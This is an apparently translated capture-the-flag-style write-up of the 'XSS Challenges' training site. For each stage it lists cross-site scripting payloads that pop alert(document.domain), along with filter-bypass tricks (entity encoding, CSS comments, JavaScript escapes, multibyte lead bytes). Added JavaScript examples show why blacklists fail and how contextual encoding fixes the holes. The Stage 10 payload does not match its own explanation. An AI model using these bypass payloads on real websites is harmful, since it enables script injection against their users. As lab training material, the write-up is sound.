XSS Challenges WriteUp

Source: Internet
Author: User

0x01: Description

Recently I found a good set of XSS exercises: XSS Challenges. If you are interested, you can try it at the portal (link).

Here I will share with you the writeup of some levels to learn from each other.

0x02: WriteUp

Stage #1

This is relatively simple.

<script>alert(document.domain)</script>

Stage #2

The input is reflected inside an attribute of the input tag, so you can close the attribute and the tag:

"><script>alert(document.domain)</script><"

It can also be triggered from inside the tag with an event handler (click the search input box):

" onclick=alert(document.domain) value="asd

Stage #3

Inserting it directly in the search box:

<script>alert(document.domain)</script>

But it is displayed as plain text, and the page source shows it has been escaped:

"<script>alert(document.domain)</script>"

However, you can intercept the request (for example with a proxy) and insert the statement in the country parameter instead:

<script>alert(document.domain)</script>

The pop-up fires.

Stage #4

Both the search and country fields are escaped, but while intercepting the request we notice a third parameter after the country that is not shown on the page. With Firebug or the F12 developer tools you can see that this field has a hidden attribute; change it to text to make it visible, then insert the following statement into the hackme field.

"><script>alert(document.domain)</script><"

Stage #5

The length of the content in the input box is limited. Just modify the length-limiting attribute (maxlength) in the developer tools.

Closed Tag:

">;<script>alert(document.domain);</script><"

Or trigger it from inside the tag with an event handler (click the search input box):

" onclick=alert(document.domain) value="asd

Stage #6

< and > are escaped, so trigger it with an on* event handler inside the input tag:

" onclick=alert(document.domain) value="asd

Stage #7

Double quotes are escaped here, but the attribute value is unquoted, so a space ends the value and you can add a new attribute:

" onclick=alert(document.domain)

The leading double quote above only ends up as displayed content; any other character would do as well.

Stage #8

The input goes into the <a> tag (the link target), so JavaScript runs when the following link is clicked:

javascript:alert(document.domain)

Stage #9

The test failed here: this stage depends heavily on the browser. From what I read, it seems to work only in IE8; I used Firefox, and my IE was already version 9. Here is how I got past it: even without knowing the intended solution, you can simply insert the JavaScript code at the appropriate position in the page.

<script>alert(document.domain)</script>

Of course, you still need to do the exercises well...

Stage #10

Similar to the previous situation, but the string domain is filtered. Because the filter removes it in a single pass, you can split the word around itself so that what is left after removal is domain:

" onclick=alert(document.domain) value="asd

Stage #11

Here the tags and handlers are filtered: script becomes xscript, and any on...= event handler becomes onxxx=. So we trigger it through an <a> tag with a javascript: URL instead, and HTML-entity-encode part of the word javascript so the filter does not match; here encoding just the s is enough.

"><a href="java&#115;cript:alert(document.domain)">a</a><"

Stage #12

Testing shows that angle brackets, double quotes and spaces are filtered out. The following works in IE; the two characters at the start are backticks (the key below Esc), which IE accepts as attribute quotes.

``onclick=alert(document.domain)

Stage #13

This stage is XSS through a CSS style attribute. In IE, CSS expression() runs JavaScript, which is used here to attach an onmouseover/onmouseout handler:

expression(onmouseover=function(){alert(document.domain)})

It can be used successfully only in IE.

Stage #14

expression is filtered; the regular expression used is:

s/(url|script|eval|expression)/xxx/ig;

You can insert a CSS comment to bypass it:

expre/**/ssion(onmouseover=function(){alert(document.domain)})
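
The following is an added example (not code from the challenge site or the original writeup) showing why the word-removal filters of Stage 10 and Stage 14 fail and what neutralises the attribute-breakout payloads of Stages 2, 5, 6 and 10: contextual output encoding instead of a blacklist. It runs under Node.js; the input tag layout and the field name p1 are assumptions.

```javascript
// Added example, not the challenge page's code. Inputs are the page's own
// payloads; the <input> layout and the name "p1" are assumed.

// Stage 10 style filter: remove the forbidden word. One non-overlapping pass
// over "domdomainain" deletes the inner "domain" and the two halves rejoin.
function stripOnce(input) {
  return input.replace(/domain/g, '');
}

// Repeating until nothing changes does defeat that split...
function stripUntilStable(input) {
  let prev;
  do { prev = input; input = stripOnce(input); } while (input !== prev);
  return input;
}

// ...but not the Stage 14 trick. The filter given on the page,
// s/(url|script|eval|expression)/xxx/ig, sees "expre/**/ssion" and does not
// match, while the CSS parser discards the comment and reads "expression".
function stage14Filter(input) {
  return input.replace(/(url|script|eval|expression)/ig, 'xxx');
}
function cssStripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// The fix is contextual output encoding, not a blacklist. With '"' encoded
// the value can no longer close the attribute, so 'onclick=' is just text.
function encodeForHtmlAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function renderSearchInputUnsafe(userValue) {   // the challenge-style bug
  return '<input type="text" name="p1" value="' + userValue + '">';
}
function renderSearchInputSafe(userValue) {
  return '<input type="text" name="p1" value="' + encodeForHtmlAttr(userValue) + '">';
}
```
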
Stage #15

< and > are escaped, but the input lands inside a JavaScript string in a document.write() call. You can write < and > as hexadecimal JavaScript escapes instead:

\x3Cscript\x3Ealert(document.domain)\x3C/script\x3E
Stage #16

Or use Unicode escapes instead:

\u003cscript\u003ealert(document.domain);\u003c/script\u003e
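
Added example (not from the challenge or the writeup) of the Stage 15 and Stage 16 bug: input that has already been HTML-escaped is placed inside a JavaScript string handed to document.write(), so \x3C and \u003c pass the HTML escaping and the JavaScript parser turns them into <. Runs under Node.js; the 'p1=' prefix and the string-escape decoder are constructed stand-ins for the challenge page and the browser.

```javascript
// Added example, not the challenge page's code. Models the Stage 15/16
// flow: user input -> HTML escape -> inside a JS string -> document.write().

function htmlEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Stand-in for the browser's JavaScript parser: resolve the string escapes
// (\xHH, \uHHHH, \\, \") that the page relies on.
function decodeJsStringBody(body) {
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g, (m, esc) => {
    if (esc[0] === 'x' || esc[0] === 'u') {
      return String.fromCharCode(parseInt(esc.slice(1), 16));
    }
    return esc;                                  // \\ -> \ , \" -> "
  });
}

// Vulnerable: HTML escaping only. The Stage 15 payload contains no < or >,
// so htmlEscape leaves it alone; the JS parser then turns \x3C into '<'
// and document.write() receives real markup.
function writtenHtmlVulnerable(userInput) {
  const literalBody = 'p1=' + htmlEscape(userInput);  // between the quotes
  return decodeJsStringBody(literalBody);
}

// Fixed: also escape for the JavaScript string context. JSON.stringify
// doubles every backslash, so the user's \x3C reaches document.write() as
// the four literal characters \x3C. Escaping < > & as \uXXXX keeps the
// literal safe even when it sits inside an inline <script> block.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e').replace(/&/g, '\\u0026');
}
function writtenHtmlFixed(userInput) {
  const literal = jsStringLiteral('p1=' + htmlEscape(userInput));
  return decodeJsStringBody(literal.slice(1, -1));   // strip the outer quotes
}
```

Note that a literal < typed by the user is handled by htmlEscape in both versions, which is exactly why the escaping looked sufficient; only the second encoding layer closes the JavaScript-string hole.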
Stage #17

Multibyte character handling, similar to PHP wide-byte injection: a special lead byte (%A7) is sent so that the following double quote is "eaten" as the second byte of a multibyte character.

1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

Stage #18

Test failed...
